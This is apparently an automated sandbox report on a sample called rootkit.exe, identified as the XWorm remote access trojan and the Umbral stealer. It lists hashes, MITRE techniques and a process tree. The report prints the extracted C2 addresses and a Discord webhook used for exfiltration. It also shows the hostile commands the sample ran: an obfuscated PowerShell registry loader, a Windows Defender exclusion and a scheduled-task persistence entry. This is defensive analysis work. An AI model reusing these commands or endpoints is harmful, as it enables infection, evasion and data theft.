Overview

overview

10

Static

static

3

rootkit.exe

windows7-x64

10

rootkit.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    09-07-2024 01:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rootkit.exe

  • Size

    274KB

  • MD5

    87119ce97d460721e8c6cb98f990c780

  • SHA1

    eac69d7550546b7812eb5701e82e079ff780d93a

  • SHA256

    f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

  • SHA512

    fce0177ad8df7622692919ff8493a9194b806774ca8508a4d28414d75e400bdf26b41818f12ad61a15a0860611d0d978d74660b970b9738c3d2b651e25290fcb

  • SSDEEP

    6144:WZL665pSvWs4dNwLIdh+JR5d3fFbeT8UumB2p3H1s93LZG9B:WlKWtnvKR51fy8VZKTo

Score
10/10
umbralxwormevasionexecutionpersistenceratstealertrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:49403

quotes-suites.gl.at.ply:49403

quotes-suites.gl.at.ply.gg:49403
Mutex

25nhnSSJeo8OHnH7

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

aes.plain

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1259895160632905769/Nt8uggl0mEBvysXT-BFIchzGoOqiC8hi2bWhb_ujCX5_THJiU5kiutfTRZpNtRkHK8Jq

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
    evasion
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{ba3e326a-1696-43fe-90a8-83710c76090d}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2340
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:480
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:612
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:1404
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe
              3⤵
                PID:832
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                3⤵
                  PID:448
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k RPCSS
                2⤵
                  PID:692
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                  2⤵
                  • Modifies security service
                  PID:772
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                  2⤵
                    PID:820
                    • C:\Windows\system32\Dwm.exe
                      "C:\Windows\system32\Dwm.exe"
                      3⤵
                        PID:1188
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs
                      2⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:864
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {98CBFCCB-028E-4AA4-944D-BD5B9581CD23} S-1-5-18:NT AUTHORITY\System:Service:
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2240
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+'st'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          4⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2600
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService
                      2⤵
                        PID:976
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkService
                        2⤵
                          PID:284
                        • C:\Windows\System32\spoolsv.exe
                          C:\Windows\System32\spoolsv.exe
                          2⤵
                            PID:492
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                            2⤵
                              PID:1040
                            • C:\Windows\system32\taskhost.exe
                              "taskhost.exe"
                              2⤵
                                PID:1120
                              • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                2⤵
                                  PID:1736
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                  2⤵
                                    PID:2560
                                  • C:\Windows\system32\sppsvc.exe
                                    C:\Windows\system32\sppsvc.exe
                                    2⤵
                                      PID:1924
                                  • C:\Windows\system32\lsass.exe
                                    C:\Windows\system32\lsass.exe
                                    1⤵
                                      PID:488
                                    • C:\Windows\system32\lsm.exe
                                      C:\Windows\system32\lsm.exe
                                      1⤵
                                        PID:496
                                      • C:\Windows\Explorer.EXE
                                        C:\Windows\Explorer.EXE
                                        1⤵
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        PID:1252
                                        • C:\Users\Admin\AppData\Local\Temp\rootkit.exe
                                          "C:\Users\Admin\AppData\Local\Temp\rootkit.exe"
                                          2⤵
                                          • Adds Run key to start application
                                          • Suspicious use of WriteProcessMemory
                                          PID:1988
                                          • C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
                                            "C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2976
                                          • C:\Users\Admin\AppData\Local\Temp\Modify.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Modify.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:780
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'
                                            3⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2248
                                          • C:\Windows\System32\schtasks.exe
                                            "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
                                            3⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2784
                                          • C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
                                            "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:2876
                                      • C:\Windows\system32\conhost.exe
                                        \??\C:\Windows\system32\conhost.exe "-5051511122106885354-846861541234880637129283130861032109-929670289-1544716396"
                                        1⤵
                                          PID:2596

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Reconnaissance

                                        Resource Development

                                        Initial Access

                                        Execution

                                        Command and Scripting Interpreter

                                        1
                                        T1059

                                        PowerShell

                                        1
                                        T1059.001

                                        Scheduled Task/Job

                                        1
                                        T1053

                                        Scheduled Task

                                        1
                                        T1053.005

                                        Persistence

                                        Boot or Logon Autostart Execution

                                        1
                                        T1547

                                        Registry Run Keys / Startup Folder

                                        1
                                        T1547.001

                                        Create or Modify System Process

                                        1
                                        T1543

                                        Windows Service

                                        1
                                        T1543.003

                                        Scheduled Task/Job

                                        1
                                        T1053

                                        Scheduled Task

                                        1
                                        T1053.005

                                        Privilege Escalation

                                        Boot or Logon Autostart Execution

                                        1
                                        T1547

                                        Registry Run Keys / Startup Folder

                                        1
                                        T1547.001

                                        Create or Modify System Process

                                        1
                                        T1543

                                        Windows Service

                                        1
                                        T1543.003

                                        Scheduled Task/Job

                                        1
                                        T1053

                                        Scheduled Task

                                        1
                                        T1053.005

                                        Defense Evasion

                                        Modify Registry

                                        2
                                        T1112

                                        Credential Access

                                        Discovery

                                        Query Registry

                                        1
                                        T1012

                                        System Information Discovery

                                        1
                                        T1082

                                        Lateral Movement

                                        Collection

                                        Command and Control

                                        Exfiltration

                                        Impact

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
                                          Filesize

                                          164KB

                                          MD5

                                          22d120454dd38d7f1a3f1cd0eb497f95

                                          SHA1

                                          4c11a082bf8e64b21310b959821a9f7324aa8107

                                          SHA256

                                          6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c

                                          SHA512

                                          1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Temp\Modify.exe
                                          Filesize

                                          229KB

                                          MD5

                                          9259d8aef8f52e8ff4fa082c0074c9b0

                                          SHA1

                                          88abb68a5632812be3c18e0c740e3818d9501b3e

                                          SHA256

                                          45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db

                                          SHA512

                                          9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
                                          Filesize

                                          42KB

                                          MD5

                                          737b2d60dc5d475685b65f5c288e00c0

                                          SHA1

                                          144ba7647d8609abe4aab74d4f191e2c594dd55a

                                          SHA256

                                          69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084

                                          SHA512

                                          96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

                                          Download Submit

                                        • memory/432-51-0x0000000000CA0000-0x0000000000CCC000-memory.dmp

                                          Filesize

                                          176KB

                                          Download

                                        • memory/432-57-0x0000000000CA0000-0x0000000000CCC000-memory.dmp

                                          Filesize

                                          176KB

                                          Download

                                        • memory/432-58-0x000007FEBE640000-0x000007FEBE650000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/432-50-0x0000000000CA0000-0x0000000000CCC000-memory.dmp

                                          Filesize

                                          176KB

                                          Download

                                        • memory/432-49-0x0000000000BF0000-0x0000000000C16000-memory.dmp

                                          Filesize

                                          152KB

                                          Download

                                        • memory/432-47-0x0000000000BF0000-0x0000000000C16000-memory.dmp

                                          Filesize

                                          152KB

                                          Download

                                        • memory/432-59-0x0000000037660000-0x0000000037670000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/480-65-0x00000000000C0000-0x00000000000EC000-memory.dmp

                                          Filesize

                                          176KB

                                          Download

                                        • memory/480-71-0x00000000000C0000-0x00000000000EC000-memory.dmp

                                          Filesize

                                          176KB

                                          Download

                                        • memory/480-73-0x0000000037660000-0x0000000037670000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/480-72-0x000007FEBE640000-0x000007FEBE650000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/488-87-0x0000000037660000-0x0000000037670000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/488-79-0x0000000000240000-0x000000000026C000-memory.dmp

                                          Filesize

                                          176KB

                                          Download

                                        • memory/488-85-0x0000000000240000-0x000000000026C000-memory.dmp

                                          Filesize

                                          176KB

                                          Download

                                        • memory/488-86-0x000007FEBE640000-0x000007FEBE650000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/496-93-0x00000000008E0000-0x000000000090C000-memory.dmp

                                          Filesize

                                          176KB

                                          Download

                                        • memory/780-15-0x0000000000DE0000-0x0000000000E20000-memory.dmp

                                          Filesize

                                          256KB

                                          Download

                                        • memory/1988-30-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

                                          Filesize

                                          9.9MB

                                          Download

                                        • memory/1988-1-0x0000000001060000-0x00000000010AA000-memory.dmp

                                          Filesize

                                          296KB

                                          Download

                                        • memory/1988-16-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

                                          Filesize

                                          9.9MB

                                          Download

                                        • memory/1988-0-0x000007FEF59C3000-0x000007FEF59C4000-memory.dmp

                                          Filesize

                                          4KB

                                          Download

                                        • memory/2248-22-0x000000001B580000-0x000000001B862000-memory.dmp

                                          Filesize

                                          2.9MB

                                          Download

                                        • memory/2248-23-0x0000000002000000-0x0000000002008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2340-41-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2340-38-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2340-44-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2340-36-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2340-37-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2340-39-0x0000000140000000-0x0000000140008000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2340-43-0x0000000077400000-0x000000007751F000-memory.dmp

                                          Filesize

                                          1.1MB

                                          Download

                                        • memory/2340-42-0x0000000077620000-0x00000000777C9000-memory.dmp

                                          Filesize

                                          1.7MB

                                          Download

                                        • memory/2600-35-0x0000000077400000-0x000000007751F000-memory.dmp

                                          Filesize

                                          1.1MB

                                          Download

                                        • memory/2600-33-0x0000000001520000-0x000000000154A000-memory.dmp

                                          Filesize

                                          168KB

                                          Download

                                        • memory/2600-31-0x0000000019E40000-0x000000001A122000-memory.dmp

                                          Filesize

                                          2.9MB

                                          Download

                                        • memory/2600-32-0x0000000000A10000-0x0000000000A18000-memory.dmp

                                          Filesize

                                          32KB

                                          Download

                                        • memory/2600-34-0x0000000077620000-0x00000000777C9000-memory.dmp

                                          Filesize

                                          1.7MB

                                          Download

                                        • memory/2976-17-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

                                          Filesize

                                          9.9MB

                                          Download

                                        • memory/2976-10-0x00000000010A0000-0x00000000010B0000-memory.dmp

                                          Filesize

                                          64KB

                                          Download

                                        • memory/2976-221-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

                                          Filesize

                                          9.9MB

                                          Download